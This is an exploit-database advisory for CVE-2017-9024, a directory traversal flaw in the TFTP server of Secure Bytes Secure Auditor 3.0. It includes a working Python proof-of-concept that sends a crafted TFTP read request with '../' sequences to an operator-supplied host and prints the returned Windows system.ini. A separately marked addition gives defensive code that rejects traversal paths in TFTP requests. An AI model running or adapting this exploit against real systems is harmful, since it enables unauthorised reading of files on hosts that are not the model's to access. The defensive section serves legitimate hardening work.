zdt | Hyp3rlinx | 1337DAY-ID-27815
History: May 21, 2017 - 12:00 a.m.

Secure Auditor 3.0 - Directory Traversal Exploit

2017-05-21 00:00:00
hyp3rlinx
0day.today

EPSS: 0.06 (Low), percentile 93.5%

Exploit for Windows platform in category remote exploits

[+] Credits: John Page aka HYP3RLINX    
 
Vendor:
====================
www.secure-bytes.com
 
  
Product:
=====================
Secure Auditor - v3.0
 
Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
 
 
 
Vulnerability Type:
===================
Directory Traversal
 
 
 
CVE Reference:
==============
CVE-2017-9024
 
 
 
Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
 
 
 
 
Exploit/POC:
=============
import sys,socket
 
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
 
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini' 
PORT = 69                                        
  
PAYLOAD = "\x00\x01"                #TFTP Read 
PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"           #TFTP Type
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
 
print "Victim Data located on : %s " %(HOST)
print out.strip()

#  0day.today [2018-03-14]  #
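
A defensive counterpart to the issue described above, as an added example that is not part of the original advisory or the vendor's code: it parses a TFTP read/write request and resolves the filename under a fixed root, refusing ../ sequences, absolute paths and drive letters. The names parse_request, resolve_under_root and authorize, and the sample file router1.cfg, are assumptions made for illustration.

```python
import os
import struct

RRQ, WRQ = 1, 2  # TFTP read/write request opcodes (RFC 1350)

class RejectedRequest(Exception):
    """The request should be answered with a TFTP ERROR packet."""

def parse_request(packet: bytes):
    """Split an RRQ/WRQ datagram into (opcode, filename, mode)."""
    if len(packet) < 4:
        raise RejectedRequest("short packet")
    (opcode,) = struct.unpack("!H", packet[:2])
    fields = packet[2:].split(b"\x00")
    # A valid request is: filename NUL mode NUL (so at least 3 fields).
    if opcode not in (RRQ, WRQ) or len(fields) < 3 or not fields[0]:
        raise RejectedRequest("not a well-formed read/write request")
    try:
        return opcode, fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        raise RejectedRequest("non-ASCII filename or mode")

def resolve_under_root(root: str, filename: str) -> str:
    """Map a requested name to a path inside root, or raise RejectedRequest."""
    # Treat '\\' and '/' alike: the server in the advisory runs on Windows.
    parts = filename.replace("\\", "/").split("/")
    # Empty parts cover absolute paths; ':' covers drive letters.
    if any(p in ("", ".", "..") or ":" in p for p in parts):
        raise RejectedRequest("path not allowed: %r" % filename)
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, *parts))
    # Second check catches links inside the root that point outside it.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise RejectedRequest("path escapes root: %r" % filename)
    return candidate

def authorize(root: str, packet: bytes):
    """Return the file path to serve, or None if the request is refused."""
    try:
        _opcode, filename, _mode = parse_request(packet)
        return resolve_under_root(root, filename)
    except RejectedRequest:
        return None

if __name__ == "__main__":
    import tempfile
    root = tempfile.mkdtemp()  # constructed stand-in for the TFTP root
    for name in (b"router1.cfg", b"../../../../Windows/system.ini"):
        pkt = b"\x00\x01" + name + b"\x00netascii\x00"  # constructed RRQ
        print(name.decode(), "->", authorize(root, pkt))
```

The lexical check and the realpath check are both needed: the first rejects traversal before any filesystem access, the second covers links that already exist under the root.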
